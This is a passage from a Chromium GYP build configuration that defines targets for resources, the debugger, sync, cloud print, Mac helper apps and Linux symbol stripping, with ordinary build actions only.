'conditions': [
['OS=="win"', {
# HACK(nsylvain): We want to enforce a fake dependency on
# intaller_util_string. install_util depends on both
# chrome_strings and installer_util_strings, but for some reasons
# Incredibuild does not enforce it (most likely a bug). By changing
# the type and making sure we depend on installer_util_strings, it
# will always get built before installer_util.
'type': 'dummy_executable',
'dependencies': ['installer_util_strings'],
}],
],
'actions': [
# Localizable resources.
{
'action_name': 'locale_settings',
'variables': {
'grit_grd_file': 'app/resources/locale_settings.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'chromium_strings.grd',
'variables': {
'grit_grd_file': 'app/chromium_strings.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'generated_resources',
'variables': {
'grit_grd_file': 'app/generated_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'google_chrome_strings',
'variables': {
'grit_grd_file': 'app/google_chrome_strings.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
],
'includes': [ '../build/grit_target.gypi' ],
},
{
'target_name': 'theme_resources',
'type': 'none',
'msvs_guid' : 'A158FB0A-25E4-6523-6B5A-4BB294B73D31',
'actions': [
{
'action_name': 'theme_resources',
'variables': {
'grit_grd_file': 'app/theme/theme_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
],
'includes': [ '../build/grit_target.gypi' ],
},
{
'target_name': 'platform_locale_settings',
'type': 'none',
'actions': [
{
'action_name': 'platform_locale_settings',
'variables': {
'grit_grd_file': '<(platform_locale_settings_grd)',
},
'includes': [ '../build/grit_action.gypi' ],
},
],
'includes': [ '../build/grit_target.gypi' ],
},
{
'target_name': 'chrome_extra_resources',
'type': 'none',
'dependencies': [
'../third_party/WebKit/Source/WebKit/chromium/WebKit.gyp:generate_devtools_grd',
],
# These resources end up in resources.pak because they are resources
# used by internal pages. Putting them in a spearate pak file makes
# it easier for us to reference them internally.
'actions': [
{
'action_name': 'component_extension_resources',
'variables': {
'grit_grd_file': 'browser/resources/component_extension_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'net_internals_resources',
'variables': {
'grit_grd_file': 'browser/resources/net_internals_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'shared_resources',
'variables': {
'grit_grd_file': 'browser/resources/shared_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'sync_internals_resources',
'variables': {
'grit_grd_file': 'browser/resources/sync_internals_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'devtools_resources',
# This can't use ../build/grit_action.gypi because the grd file
# is generated a build time, so the trick of using grit_info to get
# the real inputs/outputs at GYP time isn't possible.
'variables': {
'grit_cmd': ['python', '../tools/grit/grit.py'],
'grit_grd_file': '<(SHARED_INTERMEDIATE_DIR)/devtools/devtools_resources.grd',
},
'inputs': [
'<(grit_grd_file)',
],
'outputs': [
'<(grit_out_dir)/grit/devtools_resources.h',
'<(grit_out_dir)/devtools_resources.pak',
'<(grit_out_dir)/grit/devtools_resources_map.cc',
'<(grit_out_dir)/grit/devtools_resources_map.h',
],
'action': ['<@(grit_cmd)',
'-i', '<(grit_grd_file)', 'build',
'-o', '<(grit_out_dir)',
'-D', 'SHARED_INTERMEDIATE_DIR=<(SHARED_INTERMEDIATE_DIR)',
'<@(grit_defines)' ],
'message': 'Generating resources from <(grit_grd_file)',
},
],
'includes': [ '../build/grit_target.gypi' ],
},
{
'target_name': 'default_extensions',
'type': 'none',
'msvs_guid': 'DA9BAB64-91DC-419B-AFDE-6FF8C569E83A',
'conditions': [
['OS=="win"', {
'copies': [
{
'destination': '<(PRODUCT_DIR)/extensions',
'files': [
'browser/extensions/default_extensions/external_extensions.json'
]
}
],
}],
['OS=="linux" and chromeos==1 and branding=="Chrome"', {
'copies': [
{
'destination': '<(PRODUCT_DIR)/extensions',
'files': [
'>!@(ls browser/extensions/default_extensions/chromeos/cache/*)'
]
}
],
}],
],
},
{
'target_name': 'debugger',
'type': '<(library)',
'msvs_guid': '57823D8C-A317-4713-9125-2C91FDFD12D6',
'dependencies': [
'chrome_resources',
'chrome_strings',
'../net/net.gyp:http_server',
'theme_resources',
'../skia/skia.gyp:skia',
'../third_party/icu/icu.gyp:icui18n',
'../third_party/icu/icu.gyp:icuuc',
],
#Policy Management
'cflags': [
'<!@(<(pkg-config) --cflags-only-I libresource0)',
],
'include_dirs': [
'..',
],
'sources': [
'browser/debugger/browser_list_tabcontents_provider.cc',
'browser/debugger/browser_list_tabcontents_provider.h',
'browser/debugger/debugger_remote_service.cc',
'browser/debugger/debugger_remote_service.h',
'browser/debugger/devtools_client_host.cc',
'browser/debugger/devtools_client_host.h',
'browser/debugger/devtools_http_protocol_handler.cc',
'browser/debugger/devtools_http_protocol_handler.h',
'browser/debugger/devtools_manager.cc',
'browser/debugger/devtools_manager.h',
'browser/debugger/devtools_netlog_observer.cc',
'browser/debugger/devtools_netlog_observer.h',
'browser/debugger/devtools_protocol_handler.cc',
'browser/debugger/devtools_protocol_handler.h',
'browser/debugger/devtools_remote.h',
'browser/debugger/devtools_remote_listen_socket.cc',
'browser/debugger/devtools_remote_listen_socket.h',
'browser/debugger/devtools_remote_message.cc',
'browser/debugger/devtools_remote_message.h',
'browser/debugger/devtools_remote_service.cc',
'browser/debugger/devtools_remote_service.h',
'browser/debugger/devtools_handler.cc',
'browser/debugger/devtools_handler.h',
'browser/debugger/devtools_toggle_action.h',
'browser/debugger/devtools_window.cc',
'browser/debugger/devtools_window.h',
'browser/debugger/extension_ports_remote_service.cc',
'browser/debugger/extension_ports_remote_service.h',
'browser/debugger/inspectable_tab_proxy.cc',
'browser/debugger/inspectable_tab_proxy.h',
],
'conditions': [
['OS=="linux" or OS=="freebsd" or OS=="openbsd" or OS=="solaris"', {
'dependencies': [
'../build/linux/system.gyp:gtk',
],
}],
['OS=="linux" and meegotouch==1', {
'dependencies': [
'../build/linux/system.gyp:meegotouch',
],
}],
],
},
{
'target_name': 'utility',
'type': '<(library)',
'msvs_guid': '4D2B38E6-65FF-4F97-B88A-E441DF54EBF7',
'dependencies': [
'../base/base.gyp:base',
'../skia/skia.gyp:skia',
],
'sources': [
'utility/utility_main.cc',
'utility/utility_thread.cc',
'utility/utility_thread.h',
],
'include_dirs': [
'..',
],
'conditions': [
['OS=="linux"', {
'dependencies': [
'../build/linux/system.gyp:gtk',
],
}],
],
},
{
'target_name': 'profile_import',
'type': '<(library)',
'dependencies': [
'../base/base.gyp:base',
],
'sources': [
'profile_import/profile_import_main.cc',
'profile_import/profile_import_thread.cc',
'profile_import/profile_import_thread.h',
],
},
{
# Provides a syncapi dynamic library target from checked-in binaries,
# or from compiling a stub implementation.
'target_name': 'syncapi',
'type': '<(library)',
'sources': [
'browser/sync/engine/http_post_provider_factory.h',
'browser/sync/engine/http_post_provider_interface.h',
'browser/sync/engine/syncapi.cc',
'browser/sync/engine/syncapi.h',
],
'include_dirs': [
'..',
],
'defines' : [
'_CRT_SECURE_NO_WARNINGS',
'_USE_32BIT_TIME_T',
],
'dependencies': [
'../base/base.gyp:base',
'../build/temp_gyp/googleurl.gyp:googleurl',
'../jingle/jingle.gyp:notifier',
'../third_party/icu/icu.gyp:icuuc',
'../third_party/sqlite/sqlite.gyp:sqlite',
'app/policy/cloud_policy_codegen.gyp:policy',
'browser/sync/protocol/sync_proto.gyp:sync_proto_cpp',
'common_constants',
'common_net',
'sync',
'sync_notifier',
],
'export_dependent_settings': [
'browser/sync/protocol/sync_proto.gyp:sync_proto_cpp',
'sync',
],
# This target exports a hard dependency because syncapi.h includes
# generated proto header files from sync_proto_cpp.
'hard_dependency': 1,
},
{
'target_name': 'sync',
'type': '<(library)',
'sources': [
'browser/sync/engine/all_status.cc',
'browser/sync/engine/all_status.h',
'browser/sync/engine/apply_updates_command.cc',
'browser/sync/engine/apply_updates_command.h',
'browser/sync/engine/build_and_process_conflict_sets_command.cc',
'browser/sync/engine/build_and_process_conflict_sets_command.h',
'browser/sync/engine/build_commit_command.cc',
'browser/sync/engine/build_commit_command.h',
'browser/sync/engine/change_reorder_buffer.cc',
'browser/sync/engine/change_reorder_buffer.h',
'browser/sync/engine/cleanup_disabled_types_command.cc',
'browser/sync/engine/cleanup_disabled_types_command.h',
'browser/sync/engine/clear_data_command.cc',
'browser/sync/engine/clear_data_command.h',
'browser/sync/engine/conflict_resolver.cc',
'browser/sync/engine/conflict_resolver.h',
'browser/sync/engine/download_updates_command.cc',
'browser/sync/engine/download_updates_command.h',
'browser/sync/engine/get_commit_ids_command.cc',
'browser/sync/engine/get_commit_ids_command.h',
'browser/sync/engine/idle_query_linux.cc',
'browser/sync/engine/idle_query_linux.h',
'browser/sync/engine/model_changing_syncer_command.cc',
'browser/sync/engine/model_changing_syncer_command.h',
'browser/sync/engine/model_safe_worker.cc',
'browser/sync/engine/model_safe_worker.h',
'browser/sync/engine/net/server_connection_manager.cc',
'browser/sync/engine/net/server_connection_manager.h',
'browser/sync/engine/net/syncapi_server_connection_manager.cc',
'browser/sync/engine/net/syncapi_server_connection_manager.h',
'browser/sync/engine/net/url_translator.cc',
'browser/sync/engine/net/url_translator.h',
'browser/sync/engine/nudge_source.h',
'browser/sync/engine/polling_constants.cc',
'browser/sync/engine/polling_constants.h',
'browser/sync/engine/post_commit_message_command.cc',
'browser/sync/engine/post_commit_message_command.h',
'browser/sync/engine/process_commit_response_command.cc',
'browser/sync/engine/process_commit_response_command.h',
'browser/sync/engine/process_updates_command.cc',
'browser/sync/engine/process_updates_command.h',
'browser/sync/engine/resolve_conflicts_command.cc',
'browser/sync/engine/resolve_conflicts_command.h',
'browser/sync/engine/store_timestamps_command.cc',
'browser/sync/engine/store_timestamps_command.h',
'browser/sync/engine/syncer.cc',
'browser/sync/engine/syncer.h',
'browser/sync/engine/syncer_command.cc',
'browser/sync/engine/syncer_command.h',
'browser/sync/engine/syncer_end_command.cc',
'browser/sync/engine/syncer_end_command.h',
'browser/sync/engine/syncer_proto_util.cc',
'browser/sync/engine/syncer_proto_util.h',
'browser/sync/engine/syncer_thread.cc',
'browser/sync/engine/syncer_thread.h',
'browser/sync/engine/syncer_types.cc',
'browser/sync/engine/syncer_types.h',
'browser/sync/engine/syncer_util.cc',
'browser/sync/engine/syncer_util.h',
'browser/sync/engine/syncproto.h',
'browser/sync/engine/update_applicator.cc',
'browser/sync/engine/update_applicator.h',
'browser/sync/engine/verify_updates_command.cc',
'browser/sync/engine/verify_updates_command.h',
'browser/sync/js_arg_list.cc',
'browser/sync/js_arg_list.h',
'browser/sync/js_backend.h',
'browser/sync/js_event_handler.h',
'browser/sync/js_event_handler_list.cc',
'browser/sync/js_event_handler_list.h',
'browser/sync/js_event_router.h',
'browser/sync/js_frontend.h',
'browser/sync/js_sync_manager_observer.cc',
'browser/sync/js_sync_manager_observer.h',
'browser/sync/protocol/proto_enum_conversions.cc',
'browser/sync/protocol/proto_enum_conversions.h',
'browser/sync/protocol/proto_value_conversions.cc',
'browser/sync/protocol/proto_value_conversions.h',
'browser/sync/protocol/service_constants.h',
'browser/sync/sessions/ordered_commit_set.cc',
'browser/sync/sessions/ordered_commit_set.h',
'browser/sync/sessions/session_state.cc',
'browser/sync/sessions/session_state.h',
'browser/sync/sessions/status_controller.cc',
'browser/sync/sessions/status_controller.h',
'browser/sync/sessions/sync_session.cc',
'browser/sync/sessions/sync_session.h',
'browser/sync/sessions/sync_session_context.cc',
'browser/sync/sessions/sync_session_context.h',
'browser/sync/syncable/autofill_migration.h',
'browser/sync/syncable/blob.h',
'browser/sync/syncable/dir_open_result.h',
'browser/sync/syncable/directory_backing_store.cc',
'browser/sync/syncable/directory_backing_store.h',
'browser/sync/syncable/directory_change_listener.h',
'browser/sync/syncable/directory_event.h',
'browser/sync/syncable/directory_manager.cc',
'browser/sync/syncable/directory_manager.h',
'browser/sync/syncable/model_type.cc',
'browser/sync/syncable/model_type.h',
'browser/sync/syncable/model_type_payload_map.cc',
'browser/sync/syncable/model_type_payload_map.h',
'browser/sync/syncable/nigori_util.cc',
'browser/sync/syncable/nigori_util.h',
'browser/sync/syncable/syncable-inl.h',
'browser/sync/syncable/syncable.cc',
'browser/sync/syncable/syncable.h',
'browser/sync/syncable/syncable_changes_version.h',
'browser/sync/syncable/syncable_columns.h',
'browser/sync/syncable/syncable_id.cc',
'browser/sync/syncable/syncable_id.h',
'browser/sync/syncable/syncable_enum_conversions.cc',
'browser/sync/syncable/syncable_enum_conversions.h',
'browser/sync/util/crypto_helpers.cc',
'browser/sync/util/crypto_helpers.h',
'browser/sync/util/cryptographer.cc',
'browser/sync/util/cryptographer.h',
'browser/sync/util/dbgq.h',
'browser/sync/util/extensions_activity_monitor.cc',
'browser/sync/util/extensions_activity_monitor.h',
'browser/sync/util/nigori.cc',
'browser/sync/util/nigori.h',
'browser/sync/util/user_settings.cc',
'browser/sync/util/user_settings.h',
'browser/sync/util/user_settings_posix.cc',
'browser/sync/util/user_settings_win.cc',
],
'include_dirs': [
'..',
],
'defines' : [
'SYNC_ENGINE_VERSION_STRING="Unknown"',
'_CRT_SECURE_NO_WARNINGS',
'_USE_32BIT_TIME_T',
],
'dependencies': [
'common',
'../base/base.gyp:base',
'../crypto/crypto.gyp:crypto',
'../skia/skia.gyp:skia',
'browser/sync/protocol/sync_proto.gyp:sync_proto_cpp',
],
'export_dependent_settings': [
'../base/base.gyp:base',
'../crypto/crypto.gyp:crypto',
'browser/sync/protocol/sync_proto.gyp:sync_proto_cpp',
],
# This target exports a hard dependency because its header files include
# protobuf header files from sync_proto_cpp.
'hard_dependency': 1,
'conditions': [
['OS=="win"', {
'sources' : [
'browser/sync/util/data_encryption.cc',
'browser/sync/util/data_encryption.h',
],
}],
['OS=="linux" or OS=="freebsd" or OS=="openbsd" or OS=="solaris"', {
'dependencies': [
'../build/linux/system.gyp:gtk',
],
'link_settings': {
'libraries': [
'-lXss',
],
},
}],
['OS=="linux" and chromeos==1', {
'include_dirs': [
'<(grit_out_dir)',
],
}],
['OS=="mac"', {
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/IOKit.framework',
],
},
}],
],
},
# A library for sending and receiving server-issued notifications.
{
'target_name': 'sync_notifier',
'type': '<(library)',
'sources': [
'browser/sync/notifier/cache_invalidation_packet_handler.cc',
'browser/sync/notifier/cache_invalidation_packet_handler.h',
'browser/sync/notifier/chrome_invalidation_client.cc',
'browser/sync/notifier/chrome_invalidation_client.h',
'browser/sync/notifier/chrome_system_resources.cc',
'browser/sync/notifier/chrome_system_resources.h',
'browser/sync/notifier/invalidation_notifier.h',
'browser/sync/notifier/invalidation_notifier.cc',
'browser/sync/notifier/invalidation_util.cc',
'browser/sync/notifier/invalidation_util.h',
'browser/sync/notifier/non_blocking_invalidation_notifier.h',
'browser/sync/notifier/non_blocking_invalidation_notifier.cc',
'browser/sync/notifier/p2p_notifier.h',
'browser/sync/notifier/p2p_notifier.cc',
'browser/sync/notifier/registration_manager.cc',
'browser/sync/notifier/registration_manager.h',
'browser/sync/notifier/state_writer.h',
'browser/sync/notifier/sync_notifier.h',
'browser/sync/notifier/sync_notifier_factory.h',
'browser/sync/notifier/sync_notifier_factory.cc',
'browser/sync/notifier/sync_notifier_callback.h',
],
'include_dirs': [
'..',
],
'dependencies': [
'sync',
'../jingle/jingle.gyp:notifier',
'../third_party/cacheinvalidation/cacheinvalidation.gyp:cacheinvalidation',
],
# This target exports a hard dependency because it depends on
# cacheinvalidation (which itself has hard_dependency set).
'hard_dependency': 1,
'export_dependent_settings': [
'../jingle/jingle.gyp:notifier',
'../third_party/cacheinvalidation/cacheinvalidation.gyp:cacheinvalidation',
],
},
{
'target_name': 'service',
'type': '<(library)',
'msvs_guid': '2DA87614-55C5-4E56-A17E-0CD099786197',
'dependencies': [
'chrome_strings',
'common',
'common_net',
'../base/base.gyp:base',
'../jingle/jingle.gyp:notifier',
'../printing/printing.gyp:printing',
'../skia/skia.gyp:skia',
'../third_party/libjingle/libjingle.gyp:libjingle',
],
'sources': [
'service/service_child_process_host.cc',
'service/service_child_process_host.h',
'service/service_ipc_server.cc',
'service/service_ipc_server.h',
'service/service_main.cc',
'service/service_process.cc',
'service/service_process.h',
'service/service_process_prefs.cc',
'service/service_process_prefs.h',
'service/service_utility_process_host.cc',
'service/service_utility_process_host.h',
'service/cloud_print/cloud_print_consts.cc',
'service/cloud_print/cloud_print_consts.h',
'service/cloud_print/cloud_print_helpers.cc',
'service/cloud_print/cloud_print_helpers.h',
'service/cloud_print/cloud_print_proxy.cc',
'service/cloud_print/cloud_print_proxy.h',
'service/cloud_print/cloud_print_proxy_backend.cc',
'service/cloud_print/cloud_print_proxy_backend.h',
'service/cloud_print/cloud_print_url_fetcher.cc',
'service/cloud_print/cloud_print_url_fetcher.h',
'service/cloud_print/job_status_updater.cc',
'service/cloud_print/job_status_updater.h',
'service/cloud_print/print_system_dummy.cc',
'service/cloud_print/print_system.cc',
'service/cloud_print/print_system.h',
'service/cloud_print/printer_job_handler.cc',
'service/cloud_print/printer_job_handler.h',
'service/gaia/service_gaia_authenticator.cc',
'service/gaia/service_gaia_authenticator.h',
'service/net/service_url_request_context.cc',
'service/net/service_url_request_context.h',
'service/remoting/chromoting_host_manager.cc',
'service/remoting/chromoting_host_manager.h',
],
'include_dirs': [
'..',
],
'conditions': [
['OS=="win"', {
'defines': [
# CP_PRINT_SYSTEM_AVAILABLE disables default dummy implementation
# of cloud print system, and allows to use custom implementaiton.
'CP_PRINT_SYSTEM_AVAILABLE',
],
'sources': [
'service/cloud_print/print_system_win.cc',
],
}],
['OS=="linux"', {
'dependencies': [
'../build/linux/system.gyp:gtk',
],
}],
['use_cups==1', {
'defines': [
# CP_PRINT_SYSTEM_AVAILABLE disables default dummy implementation
# of cloud print system, and allows to use custom implementaiton.
'CP_PRINT_SYSTEM_AVAILABLE',
],
'sources': [
'service/cloud_print/print_system_cups.cc',
],
'conditions': [
['OS=="mac"', {
'link_settings': {
'libraries': [
'$(SDKROOT)/usr/lib/libcups.dylib',
]
},
}, {
'link_settings': {
'libraries': [
'-lcups',
'-lgcrypt',
],
},
}],
],
}],
['remoting==1', {
'dependencies': [
'../remoting/remoting.gyp:chromoting_host',
],
}],
['remoting==0', {
'sources!': [
'service/remoting/chromoting_host_manager.cc',
'service/remoting/chromoting_host_manager.h',
],
}],
],
},
{
'target_name': 'ipclist',
'type': 'executable',
'dependencies': [
'chrome',
'chrome_resources',
'chrome_strings',
'test_support_common',
'test_support_ui',
'../skia/skia.gyp:skia',
'../testing/gtest.gyp:gtest',
'../third_party/libxslt/libxslt.gyp:libxslt',
'../third_party/npapi/npapi.gyp:npapi',
],
'include_dirs': [
'..',
],
'sources': [
'tools/ipclist/all_messages.h',
'tools/ipclist/ipclist.cc',
],
},
],
'conditions': [
['OS=="mac"',
{ 'targets': [
{
'target_name': 'helper_app',
'type': 'executable',
'product_name': '<(mac_product_name) Helper',
'mac_bundle': 1,
'dependencies': [
'chrome_dll',
'interpose_dependency_shim',
'infoplist_strings_tool',
],
'sources': [
# chrome_exe_main_mac.mm's main() is the entry point for
# the "chrome" (browser app) target. All it does is jump
# to chrome_dll's ChromeMain. This is appropriate for
# helper processes too, because the logic to discriminate
# between process types at run time is actually directed
# by the --type command line argument processed by
# ChromeMain. Sharing chrome_exe_main_mac.mm with the
# browser app will suffice for now.
'app/chrome_exe_main_mac.mm',
'app/helper-Info.plist',
],
# TODO(mark): Come up with a fancier way to do this. It should only
# be necessary to list helper-Info.plist once, not the three times it
# is listed here.
'mac_bundle_resources!': [
'app/helper-Info.plist',
],
# TODO(mark): For now, don't put any resources into this app. Its
# resources directory will be a symbolic link to the browser app's
# resources directory.
'mac_bundle_resources/': [
['exclude', '.*'],
],
'xcode_settings': {
'CHROMIUM_BUNDLE_ID': '<(mac_bundle_id)',
'CHROMIUM_SHORT_NAME': '<(branding)',
'CHROMIUM_STRIP_SAVE_FILE': 'app/app.saves',
'INFOPLIST_FILE': 'app/helper-Info.plist',
},
'copies': [
{
'destination': '<(PRODUCT_DIR)/<(mac_product_name) Helper.app/Contents/MacOS',
'files': [
'<(PRODUCT_DIR)/libplugin_carbon_interpose.dylib',
],
},
],
'actions': [
{
# Generate the InfoPlist.strings file
'action_name': 'Generate InfoPlist.strings files',
'variables': {
'tool_path': '<(PRODUCT_DIR)/infoplist_strings_tool',
# Unique dir to write to so the [lang].lproj/InfoPlist.strings
# for the main app and the helper app don't name collide.
'output_path': '<(INTERMEDIATE_DIR)/helper_infoplist_strings',
},
'conditions': [
[ 'branding == "Chrome"', {
'variables': {
'branding_name': 'google_chrome_strings',
},
}, { # else branding!="Chrome"
'variables': {
'branding_name': 'chromium_strings',
},
}],
],
'inputs': [
'<(tool_path)',
'<(version_path)',
# TODO: remove this helper when we have loops in GYP
'>!@(<(apply_locales_cmd) \'<(grit_out_dir)/<(branding_name)_ZZLOCALE.pak\' <(locales))',
],
'outputs': [
# TODO: remove this helper when we have loops in GYP
'>!@(<(apply_locales_cmd) -d \'<(output_path)/ZZLOCALE.lproj/InfoPlist.strings\' <(locales))',
],
'action': [
'<(tool_path)',
'-b', '<(branding_name)',
'-v', '<(version_path)',
'-g', '<(grit_out_dir)',
'-o', '<(output_path)',
'-t', 'helper',
'<@(locales)',
],
'message': 'Generating the language InfoPlist.strings files',
'process_outputs_as_mac_bundle_resources': 1,
},
],
'postbuilds': [
{
# The framework (chrome_dll) defines its load-time path
# (DYLIB_INSTALL_NAME_BASE) relative to the main executable
# (chrome). A different relative path needs to be used in
# helper_app.
'postbuild_name': 'Fix Framework Link',
'action': [
'install_name_tool',
'-change',
'@executable_path/../Versions/<(version_full)/<(mac_product_name) Framework.framework/<(mac_product_name) Framework',
'@executable_path/../../../<(mac_product_name) Framework.framework/<(mac_product_name) Framework',
'${BUILT_PRODUCTS_DIR}/${EXECUTABLE_PATH}'
],
},
{
# Modify the Info.plist as needed. The script explains why this
# is needed. This is also done in the chrome and chrome_dll
# targets. In this case, -b0, -k0, and -s0 are used because
# Breakpad, Keystone, and Subersion keys are never placed into
# the helper.
'postbuild_name': 'Tweak Info.plist',
'action': ['<(tweak_info_plist_path)',
'-b0',
'-k0',
'-s0',
'<(branding)',
'<(mac_bundle_id)'],
},
],
'conditions': [
['mac_breakpad==1', {
'variables': {
# A real .dSYM is needed for dump_syms to operate on.
'mac_real_dsym': 1,
},
}],
],
}, # target helper_app
{
# This produces the app mode loader, but not as a bundle. Chromium
# itself is responsible for producing bundles.
'target_name': 'app_mode_app',
'type': 'executable',
'product_name': '<(mac_product_name) App Mode Loader',
'sources': [
'app/app_mode_loader_mac.mm',
'common/app_mode_common_mac.h',
'common/app_mode_common_mac.mm',
],
'include_dirs': [
'..',
],
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/CoreFoundation.framework',
'$(SDKROOT)/System/Library/Frameworks/Foundation.framework',
],
},
}, # target app_mode_app
{
# Convenience target to build a disk image.
'target_name': 'build_app_dmg',
# Don't place this in the 'all' list; most won't want it.
# In GYP, booleans are 0/1, not True/False.
'suppress_wildcard': 1,
'type': 'none',
'dependencies': [
'chrome',
],
'variables': {
'build_app_dmg_script_path': 'tools/build/mac/build_app_dmg',
},
'actions': [
{
'inputs': [
'<(build_app_dmg_script_path)',
'<(PRODUCT_DIR)/<(branding).app',
],
'outputs': [
'<(PRODUCT_DIR)/<(branding).dmg',
],
'action_name': 'build_app_dmg',
'action': ['<(build_app_dmg_script_path)', '<@(branding)'],
},
], # 'actions'
},
{
# Dummy target to allow chrome to require plugin_carbon_interpose to
# build without actually linking to the resulting library.
'target_name': 'interpose_dependency_shim',
'type': 'executable',
'dependencies': [
'plugin_carbon_interpose',
],
# In release, we end up with a strip step that is unhappy if there is
# no binary. Rather than check in a new file for this temporary hack,
# just generate a source file on the fly.
'actions': [
{
'action_name': 'generate_stub_main',
'process_outputs_as_sources': 1,
'inputs': [],
'outputs': [ '<(INTERMEDIATE_DIR)/dummy_main.c' ],
'action': [
'bash', '-c',
'echo "int main() { return 0; }" > <(INTERMEDIATE_DIR)/dummy_main.c'
],
},
],
},
{
# dylib for interposing Carbon calls in the plugin process.
'target_name': 'plugin_carbon_interpose',
'type': 'shared_library',
'dependencies': [
'chrome_dll',
],
'sources': [
'browser/plugin_carbon_interpose_mac.cc',
],
'include_dirs': [
'..',
],
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/Carbon.framework',
],
},
'xcode_settings': {
'DYLIB_COMPATIBILITY_VERSION': '<(version_mac_dylib)',
'DYLIB_CURRENT_VERSION': '<(version_mac_dylib)',
'DYLIB_INSTALL_NAME_BASE': '@executable_path',
},
'postbuilds': [
{
# The framework (chrome_dll) defines its load-time path
# (DYLIB_INSTALL_NAME_BASE) relative to the main executable
# (chrome). A different relative path needs to be used in
# plugin_carbon_interpose, which runs in the helper_app.
'postbuild_name': 'Fix Framework Link',
'action': [
'install_name_tool',
'-change',
'@executable_path/../Versions/<(version_full)/<(mac_product_name) Framework.framework/<(mac_product_name) Framework',
'@executable_path/../../../<(mac_product_name) Framework.framework/<(mac_product_name) Framework',
'${BUILT_PRODUCTS_DIR}/${EXECUTABLE_PATH}'
],
},
],
},
{
'target_name': 'infoplist_strings_tool',
'type': 'executable',
'dependencies': [
'chrome_strings',
'../base/base.gyp:base',
'../app/app.gyp:app_base',
],
'include_dirs': [
'<(grit_out_dir)',
],
'sources': [
'tools/mac_helpers/infoplist_strings_util.mm',
],
},
], # targets
}, { # else: OS != "mac"
'targets': [
{
'target_name': 'convert_dict',
'type': 'executable',
'msvs_guid': '42ECD5EC-722F-41DE-B6B8-83764C8016DF',
'dependencies': [
'../base/base.gyp:base',
'../base/base.gyp:base_i18n',
'convert_dict_lib',
'../third_party/hunspell/hunspell.gyp:hunspell',
],
'sources': [
'tools/convert_dict/convert_dict.cc',
],
},
{
'target_name': 'convert_dict_lib',
'product_name': 'convert_dict',
'type': 'static_library',
'msvs_guid': '1F669F6B-3F4A-4308-E496-EE480BDF0B89',
'include_dirs': [
'..',
],
'sources': [
'tools/convert_dict/aff_reader.cc',
'tools/convert_dict/aff_reader.h',
'tools/convert_dict/dic_reader.cc',
'tools/convert_dict/dic_reader.h',
'tools/convert_dict/hunspell_reader.cc',
'tools/convert_dict/hunspell_reader.h',
],
},
{
'target_name': 'flush_cache',
'type': 'executable',
'msvs_guid': '4539AFB3-B8DC-47F3-A491-6DAC8FD26657',
'dependencies': [
'../base/base.gyp:base',
'../base/base.gyp:test_support_base',
],
'sources': [
'tools/perf/flush_cache/flush_cache.cc',
],
},
{
# Mac needs 'process_outputs_as_mac_bundle_resources' to be set,
# and the option is only effective when the target type is native
# binary. Hence we cannot build the Mac bundle resources here and
# the action is duplicated in chrome_dll.gypi.
'target_name': 'packed_extra_resources',
'type': 'none',
'variables': {
'repack_path': '../tools/data_pack/repack.py',
},
'dependencies': [
'chrome_extra_resources',
],
'actions': [
{
'action_name': 'repack_resources',
'variables': {
'pak_inputs': [
'<(grit_out_dir)/component_extension_resources.pak',
'<(grit_out_dir)/devtools_resources.pak',
'<(grit_out_dir)/net_internals_resources.pak',
'<(grit_out_dir)/shared_resources.pak',
'<(grit_out_dir)/sync_internals_resources.pak',
],
},
'inputs': [
'<(repack_path)',
'<@(pak_inputs)',
],
'outputs': [
'<(PRODUCT_DIR)/resources.pak',
],
'action': ['python', '<(repack_path)', '<@(_outputs)',
'<@(pak_inputs)'],
},
]
}
],
},], # OS!="mac"
['OS=="linux"',
{ 'targets': [
{
'target_name': 'linux_symbols',
'type': 'none',
'conditions': [
['linux_dump_symbols==1', {
'actions': [
{
'action_name': 'dump_symbols',
'inputs': [
'<(DEPTH)/build/linux/dump_app_syms',
'<(PRODUCT_DIR)/dump_syms',
'<(PRODUCT_DIR)/chrome',
],
'outputs': [
'<(PRODUCT_DIR)/chrome.breakpad.<(target_arch)',
],
'action': ['<(DEPTH)/build/linux/dump_app_syms',
'<(PRODUCT_DIR)/dump_syms',
'<(linux_strip_binary)',
'<(PRODUCT_DIR)/chrome',
'<@(_outputs)'],
'message': 'Dumping breakpad symbols to <(_outputs)',
'process_outputs_as_sources': 1,
},
],
'dependencies': [
'chrome',
'../breakpad/breakpad.gyp:dump_syms',
],
}],
['linux_strip_reliability_tests==1', {
'actions': [
{
'action_name': 'strip_reliability_tests',
'inputs': [
'<(PRODUCT_DIR)/automated_ui_tests',
'<(PRODUCT_DIR)/reliability_tests',
'<(PRODUCT_DIR)/lib.target/_pyautolib.so',
],
'outputs': [
'<(PRODUCT_DIR)/strip_reliability_tests.stamp',
],
'action': ['strip',
'-g',
'<@(_inputs)'],
'message': 'Stripping reliability tests',
},
],
'dependencies': [
'automated_ui_tests',
'reliability_tests',
],
}],
],
}
],
},], # OS=="linux"
['OS=="win"',
{ 'targets': [
{
# TODO(sgk): remove this when we change the buildbots to
# use the generated build\all.sln file to build the world.
'target_name': 'pull_in_all',
'type': 'none',
'dependencies': [
'installer/mini_installer.gyp:*',
'installer/installer_tools.gyp:*',
'installer/upgrade_test.gyp:*',
'../app/app.gyp:*',
'../base/base.gyp:*',
'../chrome_frame/chrome_frame.gyp:*',
'../content/content.gyp:*',
'../ipc/ipc.gyp:*',
'../media/media.gyp:*',
'../net/net.gyp:*',
'../ppapi/ppapi.gyp:*',
'../printing/printing.gyp:*',
'../sdch/sdch.gyp:*',
'../skia/skia.gyp:*',
'../testing/gmock.gyp:*',
'../testing/gtest.gyp:*',
'../third_party/bsdiff/bsdiff.gyp:*',
'../third_party/bspatch/bspatch.gyp:*',
'../third_party/bzip2/bzip2.gyp:*',
'../third_party/codesighs/codesighs.gyp:*',
'../third_party/iccjpeg/iccjpeg.gyp:*',
